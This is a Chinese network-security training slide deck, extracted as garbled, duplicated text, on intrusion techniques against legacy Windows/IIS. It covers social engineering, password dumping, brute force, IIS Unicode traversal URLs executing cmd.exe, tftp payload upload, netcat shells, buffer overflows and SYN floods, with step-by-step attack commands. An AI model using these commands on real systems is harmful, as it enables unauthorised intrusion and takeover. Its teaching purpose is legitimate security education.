【培训课件】计算机网络安全教程(共151张)

1、计算机网络安全教程计算机网络安全教程第五章第五章 网络入侵网络入侵 5.1物理攻击与防范物理攻击与防范5.2 暴力攻击暴力攻击5.3 Unicode Unicode漏洞专题漏洞专题5.4社会工程学攻击社会工程学攻击5 5 5.5缓冲区溢出攻击缓冲区溢出攻击5.6 拒绝服务攻击拒绝服务攻击5.7 分布式拒绝服务攻击分布式拒绝服务攻击5.8 其他漏洞攻击其他漏洞攻击 防范拒绝服务攻击防范拒绝服务攻击5.9社会工程学攻击社会工程学攻击5.15.1 社交工程是使用去获得密码和其他敏感信息的科学，研究一个站点的策略其中之一就是尽可能多的了解这个组织的个体，因此黑客不断试图寻找更加精妙的方法从他们希望渗透

2、的组织那里获得信息。社会工程学攻击社会工程学攻击 举个例子：举个例子：一组高中学生曾经想要进入一个当地的公司的计算机网络，他们拟定了一个表格，调查看上去显得是无害的个人信息，例如所有秘书和行政人员和他们的配偶、孩子的名字，这些从学生转变成的黑客说这种简单的调查是他们社会研究工作的一部分。利用这份表格这些学生能够快速的进入系统，因为网络上的大多数人是使用宠物和他们配偶名字作为密码。网络攻击技术社交工程网络攻击技术社交工程n黑客们最常用的一种攻击手段黑客们最常用的一种攻击手段n能得到使用技术手段不能得到的好处能得到使用技术手段不能得到的好处n防火墙和防火墙和IDS对这种攻击不起作用对这种攻击不起作

3、用n需要高超的人际交往技术需要高超的人际交往技术n常用方式常用方式电话电子商务网络攻击技术社交工程网络攻击技术社交工程n社交工程种类社交工程种类假冒权威假扮同情个人利益改善自我感觉不引人注意的职业奖赏社交工程（社交工程（Social EngineeringSocial Engineering）n假冒权威假冒权威黑客冒充公司的领导人员在大公司中，不认识所有上司的情况非常普通在Internet上，黑客可以通过邮件列表发出入侵的安全警告，并提供解决问题的指令，指令被设计成能使黑客访问系统。足够显眼的标题和时髦的行话社交工程（社交工程（Social EngineeringSocial Engineer

4、ing）n假扮假扮电话、电子邮件、聊天室和短消息里假扮你的熟人如果你是新来的职员，冒充你的同事n同情同情如果一个人打电话来，讲述他的困难，你不帮助他吗？n个人利益个人利益假冒来自财务部门的员工，访问系统管理员社交工程（续）社交工程（续）n改善自我感觉改善自我感觉自我感觉良好的人易于被欺骗黑客进入热情的经理房间，表明自己是来自市场部的新员工，会得到详细的介绍社交工程（续）社交工程（续）n不引人注意的职业不引人注意的职业来自天然气、电力公司或者电话公司的员工请求拨号等上机操作人们会单独把黑客放在房间里n奖赏奖赏提供某种形式的奖赏会引诱人泄露信息口令比赛赢大奖、展示创造性，请列出密码避免避免受到社交

5、工程攻击受到社交工程攻击n极度警惕极度警惕Do not trust any stranger即使是很友好的人怀疑一切声称并不代表他有权这样做询问他们的权限绝大多数社交工程在高度警惕下破产避免避免受到社交工程攻击（续）受到社交工程攻击（续）n验证出处验证出处当某人电子邮件要求时，要求来电话确证对于电话里的请求，要求回电号码并确证员工号码或者身份证避免避免受到社交工程攻击（续）受到社交工程攻击（续）n说不说不对于逾越日常行为准则的要求，要拒绝要求按照正常程序和规定书面报告和授权信息n用户培训用户培训培训员工，提高安全意识物理攻击与防范物理攻击与防范5.25.2 获取管理员密码获取管理员密码1权限提

6、升权限提升2n物理安全是保护一些比较重要的设备不被接触。n物理安全比较难防，因为攻击往往来自能够接触到物理设备的用户。 引引 言言获取管理员密码获取管理员密码1n用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“winlogon.exe”，nWindows Logon Process，Windows NT 用户登陆程序，管理用户登录和退出。该进程的正常路径应是 C:WindowsSystem32 且是以 SYSTEM 用户运行获取管理员密码获取管理员密码1案例案例5-15-1得到管理员密码得到管理员密码n用户登录以后，所有的用户信息都存储在系统的一个进程中，这个进程是：“wi

7、nlogon.exe”，可以利用程序将当前登录用户的密码解码出来，如图5-1所示。获取管理员密码获取管理员密码1n使用FindPass等工具可以对该进程进行解码，然后将当前用户的密码显示出来。将FindPass.exe拷贝到C盘根目录，执行该程序，将得到当前用户得登录名，如图5-2所示。权限提升权限提升2n有时候，管理员为了安全，给其他用户建立一个普通用户帐号，认为这样就安全了。常用的方法：n 社会工程学n 本地溢出n 利用scripts目录的可执行权限n 替换系统服务n 替换admin常用程序n 利用autorun .infn Serv-U提升权限n SQL帐户密码泄露权限提升权限提升2n用

8、普通用户帐号登录后，可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。案例案例5-2 普通用户建立管理员帐号普通用户建立管理员帐号n利用Hacker帐户登录系统，在系统中执行程序GetAdmin.exe，程序自动读取所有用户列表，在对话框中点击按钮“New”，在框中输入要新建的管理员组的用户名，如图5-5所示。案例案例5-2 普通用户建立管理员帐号普通用户建立管理员帐号n输入一个用户名“IAMHacker”，点击按钮“确定”以后，然后点击主窗口的按钮“OK”，出现添加成功的窗口，如图5-6所示。暴力攻击暴力攻击5.35.3 字典文件字典文件1暴力破解操作系

9、统密码暴力破解操作系统密码2 暴力破解邮箱密码暴力破解邮箱密码3暴力破解软件密码暴力破解软件密码4n暴力攻击是一种发现密码的尝试，其方法是系统地尝试字母、数字和符号的每种可能组合，直到发现一个可起作用的正确组合。攻击者总可以通过暴力攻击获得密码，但这种方法的不利之处在于，可能需要数年才能找到一个密码。根据密码的长度和复杂性，也许有无数个可能的组合。n针对一个安全系统进行暴力攻击需要大量的时间，需要极大的意志和决心。什么是暴力攻击什么是暴力攻击暴力攻击暴力攻击n暴力攻击的一个具体例子是一个具体例子是，一个黑客试图使用计算机和信息去破解一个密码。n一个黑客需要破解段单一的被用非对称密钥加密非对称密

10、钥加密的信息，为了破解这种算法，一个黑客需要求助于非常精密复杂的方法，它使用120个工作站，两个超级计算机利用从三个主要的研究中心获得的信息，即使拥有这种配备，它也将花掉八天的时间去破解加密算法，实际上破解加密过程八天已是非常短暂的时间了。暴力破解暴力破解n两种方式的破解两种方式的破解n在线破解n在线登录目标主机，通过程序循环输入密码尝试正确的密码输入n可能会在日志里留下记录，很容易被探测出来n离线破解n取得目标主机的密码文件，然后在本地破解n花费时间较长，一般时攻击系统取得一定权限后使用在线破解在线破解nWindowsWindows系统系统n使用NAT(NetBIOS Auditing To

11、ol)进行探测n在NetBIOS开放138，139端口提供SMB服务，允许用户远程访问文件系统nWindows2000缺省共享所有驱动器和admin$n访问文件系统时需要用户身份验证nNAT可以猜测用户口令，从而取得目标机器的控制权nNAT用法：nat -o filename -u userlist -p passlist address在线破解在线破解nLinuxLinux系统系统n一般在telnet三次错误后，系统会断开连接n在线破解的软件较少离线破解离线破解n得到用户的密码文件，然后在本地破解得到用户的密码文件，然后在本地破解nWindowsWindows系统系统n用户密码存放在%sys

12、temroot%system32config和%systemroot%repair中n得到这个文件后可以使用L0phtcrack进行本地破解离线破解离线破解nLinuxLinux系统系统n用户名和密码存储在/etc/passwd中n会被很多用户看到该文件n为了加强安全性，将密码存储在etc/shadow中n只能由root存取n著名的破解工具：John the Rippern因为Linux在线破解困难，所以离线破解比较常见n很多管理员现在没有使用shadow文件暴力破解手段暴力破解手段n暴力破解的手段暴力破解的手段n字典攻击n强行攻击n组合攻击字典攻击字典攻击n字典：一些单词或者字母和数字的组合

13、字典：一些单词或者字母和数字的组合n使用字典的好处使用字典的好处n比较快速的得到用户密码，只需要在字典中进行查找字典攻击前提字典攻击前提n前提条件前提条件n绝大多数用户选择密码总是有一定规律的n姓名：自己、父母、爱人、孩子n生日n电话号码，身份证号码，学号n英文单词n上述组合n打开钱包，我就能知道你的密码n设计一个好的字典是非常有必要的字典攻击防御字典攻击防御n防止字典攻击的方法防止字典攻击的方法n使用带有特殊字符的密码n密码不是有规律的英语单词强行攻击强行攻击n在选定的字母或者数字序列里生成所有包含这些字母在选定的字母或者数字序列里生成所有包含这些字母的口令的口令n密码生成器，只要用户指定字

14、母和数字和密码的位数，就能生成字典n特点特点n密码较多，所需时间较长n分布式攻击n多台计算机共同运算n适用于对用户信息不够了解的情况强行攻击防御强行攻击防御n对策对策n使用长的密码n攻击者需要构造出很大的字典，加大攻击难度n经常更换密码n需要在方便和安全中作出抉择组合攻击组合攻击n综合前两种攻击的优点综合前两种攻击的优点n字典攻击：速度较快n强行攻击：发现所有的口令n根据掌握的用户的不同信息，进行口令组合根据掌握的用户的不同信息，进行口令组合n姓名缩写和生日的组合n在字母组合后面加上一些数字 攻击速度破解口令数量 字典攻击 快 所有字典单词强行攻击慢所有口令组合攻击中等以字典为基础的单词三种攻

15、击的比较三种攻击的比较 攻击速度破解口令数量 字典攻击 快 所有字典单词强行攻击慢所有口令组合攻击中等以字典为基础的单词字典文件字典文件1n一次字典攻击能否成功，很大因素上决定与字典文件字典攻击能否成功，很大因素上决定与字典文件。一个好的字典文件可以高效快速的得到系统的密码。攻击不同的公司、不通地域的计算机，可以根据公司管理员的姓氏以及家人的生日，可以作为字典文件的一部分，公司以及部门的简称一般也可以作为字典文件的一部分，这样可以大大的提高破解效率。字典文件字典文件1n一个字典文件本身就是一个标准的文本文件文本文件，其中的每一行就代表一个可能的密码。目前有很多工具软件专门来创建字典文件，图5-

16、8是一个简单的字典文件。暴力破解操作系统密码暴力破解操作系统密码2n字典文件为暴力破解提供了一条捷径暴力破解提供了一条捷径，程序首先通过扫描得到系统的用户，然后利用字典中每一个密码来登录系统，看是否成功，如果成功则将密码显示暴力破解操作系统密码暴力破解操作系统密码2n案例5-3 暴力破解操作系统密码 n比如使用图5-8所示的字典文件，利用上一章介绍的工具软件GetNTUser依然可以将管理员密码破解出来，如图5-9所示。暴力破解邮箱密码暴力破解邮箱密码3n邮箱的密码一般需要设置到八位以上，否则七位以下的密码容易被破解。n尤其七位全部是数字，更容易被破解。n案例5-4 电子邮箱暴力破解 n破解电

17、子邮箱密码，一个比较著名的工具软件是：黑雨POP3邮箱密码暴力破解器，比较稳定的版本是2.3.1，主界面如图5-10所示。暴力破解软件密码暴力破解软件密码4n目前许多软件都具有加密的功能，比如Office文档、Winzip文档和Winrar文档等等。这些文档密码可以有效的防止文档被他人使用和阅读。但是如果密码位数不够长的话，同样容易被破解。n案例5-5 Office文档暴力破解 修改权限密码修改权限密码在对话框中选择选项卡“安全性”，在打开权限密码和修改权限密码的两个文本框中都输入“999”，如图5-12所示。输入密码输入密码n保存并关闭该文档，然后再打开，就需要输入密码了，如图5-13所示。

18、破解破解Word文档密码文档密码n该密码是三位的，使用工具软件，Advanced Office XP Password Recovery可以快速破解Word文档密码，主界面如图5-14所示。破解破解Word文档密码文档密码n点击工具栏按钮“Open File”，打开刚才建立的Word文档，程序打开成功后会在Log Window中显示成功打开的消息，如图5-15所示。破解破解Word文档密码文档密码n设置密码长度最短是一位，最长是三位，点击工具栏开始的图标，开始破解密码，大约两秒钟后，密码被破解了，如图5-16所示。UnicodeUnicode漏洞专题漏洞专题5.45.4 Unicode漏洞的检

19、测方法漏洞的检测方法1使用使用Unicode漏洞删除主页漏洞删除主页2引言引言n通过打操作系统的补丁程序，就可以消除漏洞。只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。是2000-10-17发布的，受影响的版本：nMicrosoft IIS 5.0+Microsoft Windows 2000Microsoft IIS 5.0+Microsoft Windows 2000系列版本系列版本nMicrosoft IIS 4.0+ Microsoft Windows NT 4.0Microsoft IIS 4.0+ Microsoft Windows NT 4.0n消除该漏洞的方式

20、是安装操作系统的补丁消除该漏洞的方式是安装操作系统的补丁，只要安装了，只要安装了SP1SP1以以后，该漏洞就不存在了。微软后，该漏洞就不存在了。微软IIS 4.0IIS 4.0和和5.05.0都存在利用扩展都存在利用扩展UNICODEUNICODE字符取代字符取代/和和而能利用而能利用././目录遍历的漏洞。目录遍历的漏洞。是2000-10-17发布的，受影响的版本：nMicrosoft IIS 5.0+Microsoft Windows 2000Microsoft IIS 5.0+Microsoft Windows 2000系列系列版本版本nMicrosoft IIS 4.0+ Micros

21、oft Windows NT 4.0Microsoft IIS 4.0+ Microsoft Windows NT 4.0n消除该漏洞的方式是安装操作系统的补丁消除该漏洞的方式是安装操作系统的补丁，只要安装，只要安装了了SP1SP1以后，该漏洞就不存在了。微软以后，该漏洞就不存在了。微软IIS 4.0IIS 4.0和和5.05.0都都存在利用扩展存在利用扩展UNICODEUNICODE字符取代字符取代/和和而能利用而能利用././目录遍历的漏洞。目录遍历的漏洞。Unicode漏洞的检测方法漏洞的检测方法1n使用扫描工具来检测Unicode漏洞是否存在，使用上一章介绍的X-Scan来对目标系统进

22、行扫描，目标主机IP为：09，Unicode漏洞属于IIS漏洞，所以这里只扫描IIS漏洞就可以了，X-Scan设置如图5-17所示。Unicode漏洞的检测方法漏洞的检测方法1n将主机添加到目标地址，扫描结果如图5-18所示。Unicode漏洞的检测方法漏洞的检测方法1n可以看出，存在许多系统的漏洞。只要是/scripts开头的漏洞都是Unicode漏洞。比如：n/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dirn其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录，在IIS中的位置如图5-19所示。

23、Unicode漏洞的检测方法漏洞的检测方法1nscripts目录一般系统盘根目录下的Inetpub目录下，如图5-20所示。Unicode漏洞的检测方法漏洞的检测方法1n在Windows的目录结构中，可以使用两个点和一个斜线“./”来访问上一级目录，在浏览器中利用“scripts/././”可以访问到系统盘根目录，访问“scripts/././winnt/system32”就访问到系统的系统目录了，在system32目录下包含许多重要的系统文件，比如cmd.exe文件，可以利用该文件新建用户，删除文件等操作。Unicode漏洞的检测方法漏洞的检测方法1n浏览器地址栏中禁用符号“./”，但是可以

24、使用符号“/”的Unicode的编码。比如 “/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir”中的“%c0%2f”就是“/”的Unicode编码。这条语句是执行dir命令列出目录结构。Unicode漏洞漏洞n此漏洞从中文IIS4.0+SP6开始，还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1，台湾繁体中文也同样存在这样的漏洞。在NT4中/编码为“%c1%9c”或者“%c1%9c”，WIN2000英文版是“%c0%af”。Unicode漏洞漏洞n但从国外某些站点得来的资料显示，还有以下的编码可以实现对该漏洞的检测，

25、该编码存在于日文版、韩文版等操作系统。n%c1%pcn%c0%9vn%c0%qfn%c1%8sn%e0%80%afUnicode漏洞漏洞n利用该漏洞读取出计算机上目录列表，比如读取C盘的目录，只要在浏览器中输入n“09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+dir+c:”利用利用Unicode漏洞读取系统盘目录漏洞读取系统盘目录利用利用Unicode漏洞读取系统盘目录漏洞读取系统盘目录n利用语句得到对方计算机上装了几个操作系统以及操作系统的类型，只要读取C盘下的boot.ini文件就可以了。使用的语句是：nhtt

26、p:/09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+type+c:boot.inin执行的结果如图5-22所示。使用使用Unicode漏洞删除主漏洞删除主2使用使用Unicode漏洞删除主漏洞删除主2拷贝文件拷贝文件 为了是使用方便，利用语句将cmd.exe文件拷贝到scripts目录，并改名为c.exe，使用的语句是： 09/scripts/.%c0%2f./winnt/system32/cmd.exe?/c+C:winntsystem32cmd.exe+c.exe 程序执行结果如图5-24

27、所示。查看查看C盘的目录盘的目录 以后使用cmd.exe命令就方便了，比如查看C盘的目录，使用的语句就可以简化为： 09/scripts/c.exe?/c+c:c: 执行的结果如图5-25所示。利用利用Unicode漏洞入侵系统漏洞入侵系统 在地址栏上执行命令，用户的权限比较低，像net等系统管理指令不能执行。利用Unicode可以入侵对方的系统，并得到管理员权限。首先需要向对方服务器上传一些文件。 入侵的第一步入侵的第一步，建立tftp服务器，向对方的scripts文件夹传几个文件。利用利用Unicode漏洞入侵系统漏洞入侵系统 需要上传一个名为“idq.d

28、ll”的文件，为了上传这个文件，首先在本地计算机上搭建一个TFTP服务器，普通文件传输协议TFTP（Text File Transmission Protocol）一般用来传输单个文件。使用工具软件tftpd32.exe建立服务器。将idq.dll和tftpd32.exe放在本地的同一目录下，执行tftpd32.exe程序，主界面如图5-26所示。 利用利用Unicode漏洞入侵系统漏洞入侵系统 这样在本地的TFTP的服务器就建立好了，保留这个窗口，通过该服务器向对方传递idq.dll文件。在浏览器中执行命令： “09/scripts/.%c0%2f./win

29、nt/system32/cmd.exe?/c+tftp+-i+10+get+idq.dll”， 命令其实是“tftp i 10 get idq.dll”意思是从10服务器上获取idq.dll文件，执行成功的界面如图5-27所示。 上载文件上载文件查看查看scripts目录目录 上传完毕后可以查看一下scripts目录，是否真的上传成功了。如图5-28所示。入侵对方主机入侵对方主机 说明已经成功的在scripts目录中上传了一个idq.dll文件， 拷贝ispc.exe文件到本地计算机的C盘根目录，在DOS命令行下执行命令： “i

30、spc.exe 09/scripts/idq.dll”，连接成功后就直接进入了对方的DOS命令行下，而且具有管理员权限，入侵的过程5-29所示。 建立用户建立用户 可以在对方计算机上做管理员可以做的一切事情，比如添加用户，建立一个用户名为“Hacker123”，密码也是“Hacker123”的用户，如图5-30所示。其他漏洞攻击其他漏洞攻击5.55.5 利用打印漏洞利用打印漏洞1SMB致命攻击致命攻击2 利用打印漏洞利用打印漏洞经过测试，该漏洞在SP2、SP3以及SP4版本上依然存在，但是不能保证100%入侵成功。 ，使用的语法格式是：“cniis

31、09 0”，第一个参数是目标的IP地址，第二参数是目标操作系统的补丁号，因为09没有打补丁，这里就是0。拷贝cniis.exe文件到C盘根目录，执行程序如图5-31所示。1SMB致命攻击致命攻击nSMB（Session Message Block，会话消息块协议会话消息块协议）又叫做NetBIOS或LanManager协议，用于不同计算机之间文件、打印机、串口和通讯的共享文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。nSMB协议版本有很多种，在Windows 98、Windows NT、Windows 2000和XP使用的是NTLM 0.

32、12版本。2SMB致命攻击致命攻击n利用该协议可以进行各方面的攻击，比如可以抓取其他用户访问自己计算机共享目录的SMB会话包，然后利用SMB会话包登录对方的计算机。下面介绍利用SMB协议让对方操作系统系统重新启动或者蓝屏。2致命攻击致命攻击n使用的工具软件是：SMBDie V1.0SMBDie V1.0，该软件对打了SP3、SP4的计算机依然有效，必须打专门的SMB补丁，软件的主界面如图5-32所示。致命攻击致命攻击n攻击的时候，需要两个参数：对方的IP地址和对方的机器名，窗口中分别输入这两项，如图5-33所示。致命攻击致命攻击n然后再点按钮“Kill”，如果参数输入没有错误的话，对方计算机立

33、刻重启或蓝屏，命中率几乎100%，被攻击的计算机蓝屏界面如图5-34所示。缓冲区溢出攻击缓冲区溢出攻击5.65.6 RPC漏洞溢出漏洞溢出1利用利用IIS溢出进行攻击溢出进行攻击2 利用利用WebDav远程溢出远程溢出 3引言引言 目前最流行的一种攻击技术就是缓冲区溢出攻击缓冲区溢出攻击。当目标操作系统收到了超过了它的最大能接收的信超过了它的最大能接收的信息量息量的时候，将发生缓冲区溢出。这些多余的数据将使程序的缓冲区溢出，然后覆盖了实际的程序数据，缓冲区溢出使目标系统的程序被修改，经过这种修改的结果使在系统上产生一个后门。 这项攻击对技术要求比较高，但是攻击的过程却非常简单。缓冲区溢出原理很

34、简单，比如程序：引言引言 void function(char * szPara1)char buff16;strcpy(buffer, szPara1); 程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPara1的长度大于16，就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。引言引言 void function(char * szPara1)char buff16;strcpy(buffer, szPara1); 程序中利用strcpy函数将szPara1中的内容拷贝到buff中，只要szPar

35、a1的长度大于16，就会造成缓冲区溢出。存在strcpy函数这样问题的C语言函数还有：strcat()、gets()、scanf()等。缓存区溢出历史缓存区溢出历史 缓存区溢出历史 1988年的Morris蠕虫病毒，成功攻击了6000多台机器：利用UNIX服务finger中的缓冲区溢出漏洞来获得访问权限，得到一个shell 1996年前后，开始出现大量的Buffer Overflow攻击，因此引起人们的广泛关注 源码开放的操作系统首当其冲 随后，Windows系统下的Buffer Overflows也相继被发掘出来 已经有一些非常经典细致的文章来介绍与Buffer overflows有关的技术

36、缓冲区溢出的基本介绍缓冲区溢出的基本介绍 基本的思想 通过修改某些内存区域，把一段恶意代码存储到一个buffer中，并且使这个buffer被溢出，以便当前进程被非法利用(执行这段恶意的代码) “SQL Slammer”蠕虫王的发作原理，就是利用未及时更新补丁的MS SQL Server数据库缓冲溢出漏洞。采用不正确的方式将数据发到MS Sql Server的监听端口，这个错误可以引起缓冲溢出攻击。 出现的MSBLAST病毒正是利用了微软关于RPC 接口中远程任意可执行代码漏洞，“中招”的机器会反复重启，或者拷贝、粘贴功能不工作等现象。 仅去年缓冲区溢出就占使 CERT/CC 提出建议的所有重大

37、安全性错误的百分之五十以上。并且数据显示这一问题正在扩大，而不是在缩减。 缓冲区溢出的实例缓冲区溢出的实例缓冲区溢出的保护方法缓冲区溢出的保护方法 编写正确的代码 最简单的方法就是用grep来搜索源代码中容易产生漏洞的库的调用 为了对付这些问题，人们已经开发了一些高级的查错工具，如faultinjection等。这些工具的目的在于通过人为随机地产生一些缓冲区溢出来寻找代码的安全漏洞。 缓冲区溢出的保护方法缓冲区溢出的保护方法 非执行的缓冲区 通过使被攻击程序的数据段地址空间不可执行，从而使得攻击者不可能执行被植入被攻击程序输入缓冲区的代码，这种技术被称为非执行的缓冲区技术。事实上，很多老的Un

38、ix系统都是这样设计的，但是近来的Unix和MS Windows系统为实现更好的性能和功能，往往在数据段中动态地放人可执行的代码。所以为了保持程序的兼容性不可能使得所有程序的数据段不可执行。但是我们可以设定堆栈数据段不可执行，这样就可以最大限度地保证了程序的兼容性。 缓冲区溢出的保护方法缓冲区溢出的保护方法 数组边界检查 程序指针完整性检查 RPC漏洞溢出漏洞溢出 远程过程调用RPC（Remote Procedure Call)，是操作系统的一种消息传递功能，允许应用程序呼叫网络上的计算机。当系统启动的时候，自动加载RPC服务。可以在服务列表中看到系统的RPC服务，如图5-35所示。1利用利用

39、RPC漏洞建立超级用户漏洞建立超级用户 RPC溢出漏洞，对SP4也适用，必须打专用补丁。利用工具工具scanms.exe文件文件检测RPC漏洞，该工具是ISS安全公司2003年7月30日发布的，运行在命令行下用来检测指定IP地址范围内机器是否已经安装了“DCOM RPC 接口远程缓冲区溢出漏洞（823980-MS03-026）”补丁程序。 如果没有安装补丁程序，该IP地址就会显示出“VULN”。首先拷贝该文件到C盘根目录，现在要检查地址段09到10的主机，执行命令“scanms.exe 09-10”，检查过

40、程如图5-36所示。检查缓冲区溢出漏洞检查缓冲区溢出漏洞利用缓冲区溢出漏洞攻击利用缓冲区溢出漏洞攻击 利用工具软件attack.exe对09进行攻击。攻击的结果将在对方计算机上建立一个具有管理员权限的用户，并终止了对方的RPC服务。 新建用户的用户名和密码都是qing10，这样就可以登录对方计算机了，RPC服务停止操作系统将有许多功能不能使用，非常容易被管理员发现，使用工具软件OpenRpcSs.exe来给对方重启RPC服务。攻击的全过程如图5-37所示。攻击的全过程攻击的全过程 IIS溢出原理溢出原理 IIS缓冲区溢出 IIS：windows系统上最不安全的服务系统上最

41、不安全的服务 ISAPI提供对管理脚本提供对管理脚本( (.ida文件文件) )和和Inernet数据数据( (.idq) )查询的支持查询的支持 向向idq.dll发送一个过量的变量发送一个过量的变量GET /null.ida? buffer=X HTTP/1.1Host: 任意值任意值 一些具体的攻击方法没有公开一些具体的攻击方法没有公开 Code RedCode Red蠕虫利用了这一漏洞蠕虫利用了这一漏洞2利用利用IIS溢出进行攻击溢出进行攻击 案例5-11 利用IIS溢出入侵系统 利用软件Snake IIS溢出工具可以让对方的IIS溢出，还可以捆绑执行的命令和在对方计算机上开辟端口，工

42、具软件的主界面如图5-38所示。2 该软件适用于各种类型的操作系统，比如对09进行攻击，09的操作系统的Windows 2000，没有安装补丁程序，攻击完毕后，开辟一个813端口，并在对方计算机上执行命令“dir c:”设置如图5-39所示。利用利用IIS溢出进行攻击溢出进行攻击2 点击按钮“IDQ溢出”，出现攻击成功的提示框，如图5-40所示。2利用利用IIS溢出进行攻击溢出进行攻击 这个时候，813端口已经开放，利用工具软件nc.exe连接到该端口，将会自动执行刚才发送的DOS命令“dir c:”，使用的语法是：nc.exe -vv 172.18

43、.25.109 813，其中-vv是程序的参数，813是目标端口。可以看到命令的执行结果，如图5-41所示。利用利用IIS溢出进行攻击溢出进行攻击2监听本地端口监听本地端口 下面利用nc.exe和snake工具的另外一种组合入侵对方计算机。首先利用nc.exe命令监听本地的813端口。使用的基本语法是“nc -l -p 813”，执行的过程如图5-42所示。 这个窗口就这样一直保留，启动工具软件snake，本地的IP地址是10，要攻击的计算机的IP地址是09，选择溢出选项中的第一项，设置IP为本地IP地址，端口是813，如图5-43所示。监听本地端口

44、监听本地端口 设置好以后，点击按钮“IDQ溢出”，程序显示对话框如图4-44所示。监听本地端口监听本地端口 查看nc命令的DOS框，在该界面下，已经执行了设置的DOS命令。将对方计算机的C盘根目录列出来，如图4-45所示。监听本地端口监听本地端口 IIS默认提供了对WebDav的支持，通过WebDav可以通过HTTP向用户提供远程文件存储的服务。但是WebDav使用了ntDll.dll函数，这个函数对在长度检查中存在一个整数溢出问题，可以利用此漏洞获取权限。WebDav远程溢出原理远程溢出原理3 需要使用工具软件nc.exe和webdavx3.exe，首先在DOS命令行下执行webdavx3.

45、exe，如果执行的话，该程序将提示已经过期了，如图4-46所示。利用利用WebDav远程溢出远程溢出3攻击攻击 修改本地系统时间到2001年，这样就可以攻击了，在命令后面直接跟对方的IP地址就可以了，现在要攻击的计算机是09，执行情况如图4-47所示。入侵对方的计算机入侵对方的计算机 该程序不能自动退出，当发现程序长时间没有反映的时候，需要手工按下“CTRL+C”退出程序。该程序在对方的计算机上开了一个端口7788，依然可以nc.exe程序入侵对方的计算机，过程如图4-48所示。拒绝服务攻击拒绝服务攻击5.75.7 SYN风暴风暴1Smurf攻击攻击2 利用处理程序错误进

46、行攻击利用处理程序错误进行攻击 3拒绝服务攻击介绍拒绝服务攻击介绍 拒绝服务攻击的简称是：DoS（Denial of Service）攻击，凡是造成目标计算机拒绝提供服务的攻击都称为DoS攻击，其目的是使目标计算机或网络无法提供正常的服务。 最常见的DoS攻击是：计算机网络带宽攻击和连通性攻击。带宽攻击是以极大的通信量冲击网络，使网络所有可用的带宽都被消耗掉，最后导致合法用户的请求无法通过。连通性攻击指用大量的连接请求冲击计算机，最终导致计算机无法再处理合法用户的请求。DoSDoS的技术历史的技术历史 早期的Internet蠕虫病毒 Robert Morris的RTM蠕虫 消耗网络资源 分片装

47、配，非法的分片装配，非法的TCP标志，标志，SYN Flood，等，等 利用系统实现上的缺陷，点对点形式 Ping of Death, IP分片重叠 分布式DoS(DDoS)攻击 最著名的smurf攻击 针对不同的系统，攻击的结果可能不同，但是攻击的攻击的根本都是利用这些系统中根本都是利用这些系统中TCP/IP协议族的设计弱点和协议族的设计弱点和缺点缺点.只有对现有TCP/IP协议族进行重大改变才能修正这些缺陷。目前还没有一个完整的解决方案，但是可以采取一些措施尽量降低这种攻击发生的可能性，减少损失。SYN风暴风暴1 IP协议是Internet网络层的标准协议，提供了不可靠的无连接的网络分组传

48、输服务。IP协议的基本数据传输单元成为网络包。 TCP协议位于IP协议和应用层协议之间，提供了可靠的面向连接数据流传输服务。TCP通过流控制机制和重传等技术来实现可靠的数据报传输。SYN风暴背景介绍风暴背景介绍 握手握手的第一报文段的码元字段的SYN为被置为被置1.第二个报文的SYN和ACK问均被置1，指出这是对第一个SYN报文段的确认并继续握手操作。最后一个握手报文仅仅是一个确认信息，通知目标主机已成功建立了双方所同意的这个连接。SYN风暴背景介绍风暴背景介绍 针对每个连接，连接双方都要为该连接分配以下内存资源。 （1）socket结构：描述所使用的协议、状态信息、地址信息、连接结构：描述所

49、使用的协议、状态信息、地址信息、连接队列、缓冲区和其他标志位等。队列、缓冲区和其他标志位等。 （2）Internet协议控制块结构：描述协议控制块结构：描述TCP状态信息、状态信息、IP地址、端口地址、端口号、号、IP头原型、目标地址及其其他选项等。头原型、目标地址及其其他选项等。 （3）TCP控制块结构：描述时钟信息、序列号、流控制信息及带外控制块结构：描述时钟信息、序列号、流控制信息及带外数据等。数据等。SYN风暴背景介绍风暴背景介绍SYN-SENTESTAB-LISHEDSYN-RCVDLISTENESTAB-LISHED用三次握手建立用三次握手建立 TCP 连接的各状态连接的各状态 S

50、YN = 1, seq = xACK = 1, seq = x + 1, ack = y 1CLOSEDCLOSED数据传送主动打开被动打开AB客户服务器SYN = 1, ACK = 1, seq = y, ack= x 1 在B返回一个确认的SYN-ACK包的时候有个潜在的弊端，他可能不会接到A回应的ACK包。这个也就是所谓的半开放连接半开放连接，B需要 耗费一定的数量的系统内存耗费一定的数量的系统内存来等待这个未决的连接来等待这个未决的连接，虽然这个数量是受限的，但是恶意者可以通过创建很多的半开放式连接来发动SYN洪水攻击 。SYN风暴攻击手段风暴攻击手段 通过ip欺骗可以很容易的实现半开

51、放连接。攻击者发送SYN包给受害者系统，这个看起来是合法的，但事实上所谓的C根本不会回应这个 。SYN-ACK报文，这意味着受害者将永远不会接到ACK报文。而此时，半开放连接将最终耗用受害者所有的系统资源，受害者将不能再接收任何其他的请求。SYN风暴攻击手段风暴攻击手段 通常等待ACK返回包有超时限制，所以半开放，连接将最终超时，而受害者系统也会自动修复。虽然这样，但是在受害者系统修复之前，攻击者可以很容易的一直发送虚假的虚假的SYN请求包请求包来持续攻击。SYN风暴攻击手段风暴攻击手段 在大多数情况下，受害者几乎不能接受任何其他的请求，但是这种攻击不会影响到已经存在的进站或者是出站连接。虽然

